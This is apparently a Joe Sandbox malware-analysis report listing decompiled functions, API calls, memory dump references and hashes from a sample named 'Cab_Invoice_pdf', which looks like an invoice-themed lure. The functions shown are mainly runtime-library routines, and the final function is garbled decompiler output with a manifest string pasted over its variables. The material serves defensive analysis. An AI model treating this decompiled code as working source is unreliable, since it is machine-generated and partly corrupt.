                            • Instruction Fuzzy Hash: 58F0BB3354A72735FD2D359E6C06ADB1B9C4F935FDB34001AFA0456AC4DE51E58350AC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013201DD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E013201DD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t19;
				signed int _t21;

				_t10 =  *0x133c008; // 0xa212446c
				_v8 = _t10 ^ _t21;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t19 = _t12;
					if(_t19 != 0) {
						 *0x133019c(_a4);
						_t12 =  *_t19();
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E0131786A();
				return _t12;
			}









                            0x013201e4
                            0x013201eb
                            0x013201ee
                            0x013201f2
                            0x013201fd
                            0x01320205
                            0x01320210
                            0x01320216
                            0x0132021a
                            0x01320221
                            0x01320227
                            0x01320227
                            0x01320229
                            0x0132022e
                            0x01320233
                            0x01320233
                            0x0132023e
                            0x01320246

                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0132018E,?,?,0132012E,?,0133A6E0,0000000C,01320285,?,00000002), ref: 013201FD
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01320210
                            • FreeLibrary.KERNEL32(00000000,?,?,?,0132018E,?,?,0132012E,?,0133A6E0,0000000C,01320285,?,00000002,00000000), ref: 01320233
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 9c5471be0490e04f043c39f69399195db0c7d4f3522b7c0b8a60e68e77a55b23
                            • Instruction ID: df960972871a1bb0b8f81588e731659e347d87df2ae383f1bc2075812b6b3f83
                            • Opcode Fuzzy Hash: 9c5471be0490e04f043c39f69399195db0c7d4f3522b7c0b8a60e68e77a55b23
                            • Instruction Fuzzy Hash: F8F06235A1021CBFDB299F95DC09B9DBFBCEF49716F000169F909A2240DB349A44CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013205E4, Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E013205E4(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x133c008; // 0xa212446c
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E0131F6AC( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E01319353(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E01319353(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E01319353(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0132850F(_t56);
						_t40 = E013209EB(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0132850F(_t56);
						E013209EB(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x133c008;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                            0x013205e4
                            0x013205ee
                            0x013205f2
                            0x013205f4
                            0x013205f8
                            0x01320602
                            0x01320613
                            0x01320618
                            0x0132061a
                            0x0132061c
                            0x0132061e
                            0x01320620
                            0x01320624
                            0x013206de
                            0x013206ec
                            0x013206ee
                            0x013206f3
                            0x013206fa
                            0x013206fc
                            0x0132070a
                            0x01320719
                            0x0132071c
                            0x0132071e
                            0x00000000
                            0x0132071f
                            0x0132062c
                            0x01320631
                            0x01320636
                            0x01320638
                            0x01320638
                            0x0132063a
                            0x0132063f
                            0x01320643
                            0x01320643
                            0x01320646
                            0x01320665
                            0x01320665
                            0x01320667
                            0x0132066a
                            0x01320673
                            0x01320676
                            0x0132067b
                            0x0132067e
                            0x01320683
                            0x00000000
                            0x00000000
                            0x01320685
                            0x00000000
                            0x01320648
                            0x01320648
                            0x0132064a
                            0x01320653
                            0x01320656
                            0x0132065b
                            0x0132065e
                            0x01320663
                            0x0132068d
                            0x01320690
                            0x01320692
                            0x01320695
                            0x0132069d
                            0x013206a3
                            0x013206aa
                            0x013206ac
                            0x013206b4
                            0x013206c3
                            0x013206c7
                            0x013206c9
                            0x013206cc
                            0x00000000
                            0x00000000
                            0x013206ce
                            0x013206d1
                            0x013206d3
                            0x013206d3
                            0x013206d4
                            0x013206d6
                            0x013206d9
                            0x00000000
                            0x013206d3
                            0x00000000
                            0x01320663
                            0x01320646
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: f9efa9c568e0291ca45ce453f4b786e7274141653b7e36f57ab8efdfa8cd2e26
                            • Instruction ID: 6ade030b4dd62635b40d77d7f612ad806c8e9e11078fe5e7ac706b52b2b1f7ee
                            • Opcode Fuzzy Hash: f9efa9c568e0291ca45ce453f4b786e7274141653b7e36f57ab8efdfa8cd2e26
                            • Instruction Fuzzy Hash: E2410832A002249FDB28EF7CC880A5EB7F5EF89328F254599E555EB385D731E905CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131E132, Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E0131E132(void* __ecx, short* _a4, short* _a8) {
				int _t7;
				char* _t13;
				signed int _t14;
				char* _t15;
				int _t19;
				intOrPtr* _t20;
				short* _t21;
				void* _t22;
				void* _t25;
				int _t29;
				int _t33;
				intOrPtr _t35;
				char* _t36;

				_t25 = __ecx;
				_t7 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, 0);
				_t21 = _a8;
				_t33 = _t7;
				_t35 = 0x2a;
				if(_t33 != 0) {
					if(_t21 != 0) {
						_t19 = WideCharToMultiByte(0, 0, _t21, 0xffffffff, 0, 0, 0, 0);
						if(_t19 == 0) {
							goto L1;
						} else {
							_t33 = _t33 + _t19;
						}
					}
				} else {
					L1:
					_t20 = E0131C9CE();
					_t33 = 0;
					 *_t20 = _t35;
				}
				_t36 = E01320B10(_t25, _t33, 1);
				if(_t36 == 0) {
					L8:
					_t22 = 0;
				} else {
					_t29 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, _t36, _t33, 0, 0);
					if(_t29 != 0) {
						if(_t21 == 0) {
							L12:
							_t13 = _t36;
							_t36 = 0;
							_push(0);
							_push(_t13);
							_t14 = E01326882(0);
							asm("sbb bl, bl");
							_t22 =  ~_t14 + 1;
						} else {
							_t15 = _t29 + _t36;
							 *((char*)(_t15 - 1)) = 0x3d;
							if(WideCharToMultiByte(0, 0, _t21, 0xffffffff, _t15, _t33 - _t29, 0, 0) == 0) {
								goto L7;
							} else {
								goto L12;
							}
						}
					} else {
						L7:
						 *((intOrPtr*)(E0131C9CE())) = 0x2a;
						goto L8;
					}
				}
				E013209EB(_t36);
				return _t22;
			}
















                            0x0131e132
                            0x0131e147
                            0x0131e14d
                            0x0131e150
                            0x0131e154
                            0x0131e157
                            0x0131e166
                            0x0131e173
                            0x0131e17b
                            0x00000000
                            0x0131e17d
                            0x0131e17d
                            0x0131e17d
                            0x0131e17b
                            0x0131e159
                            0x0131e159
                            0x0131e159
                            0x0131e15e
                            0x0131e160
                            0x0131e160
                            0x0131e187
                            0x0131e18d
                            0x0131e1b3
                            0x0131e1b3
                            0x0131e18f
                            0x0131e1a2
                            0x0131e1a6
                            0x0131e1c5
                            0x0131e1e5
                            0x0131e1e5
                            0x0131e1e7
                            0x0131e1e9
                            0x0131e1ea
                            0x0131e1eb
                            0x0131e1f5
                            0x0131e1f8
                            0x0131e1c7
                            0x0131e1c9
                            0x0131e1d0
                            0x0131e1e3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131e1e3
                            0x0131e1a8
                            0x0131e1a8
                            0x0131e1ad
                            0x00000000
                            0x0131e1ad
                            0x0131e1a6
                            0x0131e1b6
                            0x0131e1c2

                            APIs
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E147
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E173
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E19C
                            • _free.LIBCMT ref: 0131E1B6
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,0131DFF2,?,?), ref: 0131E1DB
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$_free
                            • String ID:
                            • API String ID: 4292660327-0
                            • Opcode ID: 5231d1f99b7a728d0a99132b1d4e96ab9a2d523d26edb8bebf24f509a79612d2
                            • Instruction ID: abd3a894079bf9fc1e1a306f17984d7469b662d96d7c71592780906825045d3b
                            • Opcode Fuzzy Hash: 5231d1f99b7a728d0a99132b1d4e96ab9a2d523d26edb8bebf24f509a79612d2
                            • Instruction Fuzzy Hash: 8521A8B26493257EFB2A19799C48DBB6A9DDB86B78B140239FD15C71C4DD718C008670
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F437C, Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                            Download Yara Rule
                            C-Code - Quality: 81%
                            			E6E2F437C(void* __ebx, void* __ecx, void* __edx, void* __edi) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t79;
				signed int _t84;
				void* _t87;
				void* _t88;
				void* _t100;
				void* _t103;
				signed int _t108;
				void* _t111;
				signed int _t113;
				signed int _t117;
				intOrPtr* _t119;
				void* _t121;

				_t103 = __edx;
				_t87 = __ecx;
				E6E2F5090(__ebx, __edi, 0x6e3f75e0, 0x10);
				_t43 = E6E2F4C25(_t87, 0);
				_pop(_t88);
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t121 - 0x1d)) = E6E2F4B2A();
					_t83 = 1;
					 *((char*)(_t121 - 0x19)) = 1;
					 *(_t121 - 4) =  *(_t121 - 4) & 0x00000000;
					_t129 = "urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n";
					if("urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" != 0) {
						E6E2F4E29(_t103, __edi, _t111, 7);
						asm("int3");
						E6E2F5090(1, __edi, 0x6e3f7600, 0x10);
						_t48 =  *0x6e3f8a48; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6e3f8a48 = _t48 - 1;
							 *(_t121 - 0x1c) = 1;
							 *(_t121 - 4) =  *(_t121 - 4) & 0x00000000;
							 *((char*)(_t121 - 0x20)) = E6E2F4B2A();
							 *(_t121 - 4) = 1;
							__eflags = "urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" - 2;
							if("urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" != 2) {
								E6E2F4E29(_t103, 1, _t111, 7);
								asm("int3");
								E6E2F5090(1, 1, 0x6e3f7628, 0xc);
								_t108 =  *(_t121 + 0xc);
								__eflags = _t108;
								if(_t108 != 0) {
									L23:
									 *(_t121 - 4) =  *(_t121 - 4) & 0x00000000;
									__eflags = _t108 - 1;
									if(_t108 == 1) {
										L26:
										_t84 =  *(_t121 + 0x10);
										_t113 = E6E2F463E( *((intOrPtr*)(_t121 + 8)), _t108, _t84);
										 *(_t121 - 0x1c) = _t113;
										__eflags = _t113;
										if(_t113 != 0) {
											_t113 = E6E2F4329(_t88,  *((intOrPtr*)(_t121 + 8)), _t108, _t84);
											 *(_t121 - 0x1c) = _t113;
											__eflags = _t113;
											if(_t113 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t108 - 2;
										if(_t108 == 2) {
											goto L26;
										} else {
											_t84 =  *(_t121 + 0x10);
											L28:
											_push(_t84);
											_t113 = E6E2F4A3C( *((intOrPtr*)(_t121 + 8)), _t108);
											 *(_t121 - 0x1c) = _t113;
											__eflags = _t108 - 1;
											if(_t108 == 1) {
												__eflags = _t113;
												if(_t113 == 0) {
													_push(_t84);
													_t59 = E6E2F4A3C( *((intOrPtr*)(_t121 + 8)), _t56);
													__eflags = _t84;
													_t34 = _t84 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t88);
													E6E2F463E( *((intOrPtr*)(_t121 + 8)), _t113, _t84);
												}
											}
											__eflags = _t108;
											if(_t108 == 0) {
												L33:
												_t113 = E6E2F4329(_t88,  *((intOrPtr*)(_t121 + 8)), _t108, _t84);
												 *(_t121 - 0x1c) = _t113;
												__eflags = _t113;
												if(_t113 != 0) {
													_t113 = E6E2F463E( *((intOrPtr*)(_t121 + 8)), _t108, _t84);
													 *(_t121 - 0x1c) = _t113;
												}
											} else {
												__eflags = _t108 - 3;
												if(_t108 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t121 - 4) = 0xfffffffe;
									_t54 = _t113;
								} else {
									__eflags =  *0x6e3f8a48 - _t108; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0x10));
								return _t54;
							} else {
								E6E2F4A6A(E6E2F4BF5());
								E6E2F5058();
								"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" = "urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" & 0x00000000;
								 *(_t121 - 4) =  *(_t121 - 4) & 0x00000000;
								E6E2F4518();
								_t67 = E6E2F4D96( *((intOrPtr*)(_t121 + 8)), 0);
								asm("sbb esi, esi");
								_t117 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t117;
								 *(_t121 - 0x1c) = _t117;
								 *(_t121 - 4) = 0xfffffffe;
								E6E2F4525();
								_t69 = _t117;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0x10));
							return _t69;
						}
					} else {
						"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n  <compatibility xmlns=\"urn:schemas-microsoft-com:compatibility.v1\">\r\n    <application>\r\n      <supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"/>\r\n      <supportedOS Id=\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"/>\r\n      <supportedOS Id=\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"/>\r\n      <supportedOS Id=\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"/>\r\n      <supportedOS Id=\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"/>\r\n    </application>\r\n  </compatibility>\r\n  <application xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <windowsSettings>\r\n      <longPathAware xmlns=\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\">true</longPathAware>\r\n    </windowsSettings>\r\n  </application>\r\n  <dependency>\r\n    <dependentAssembly>\r\n      <assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\"\r\n                        version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyToken=\"6595b64144ccf1df\" language=\"*\" />\r\n    </dependentAssembly>\r\n  </dependency>\r\n</assembly>\r\n" = 1;
						if(E6E2F4B87(_t129) != 0) {
							E6E2F4A5E(E6E2F502C());
							_t79 = E6E2F4A7C();
							_push(0x6e2f6148);
							L6E2F54A8();
							_t100 = 0x6e2f6144;
							if(_t79 == 0 && E6E2F4B5C(_t100) != 0) {
								_push(0x6e2f6140);
								_push(0x6e2f613c);
								L6E2F54A2();
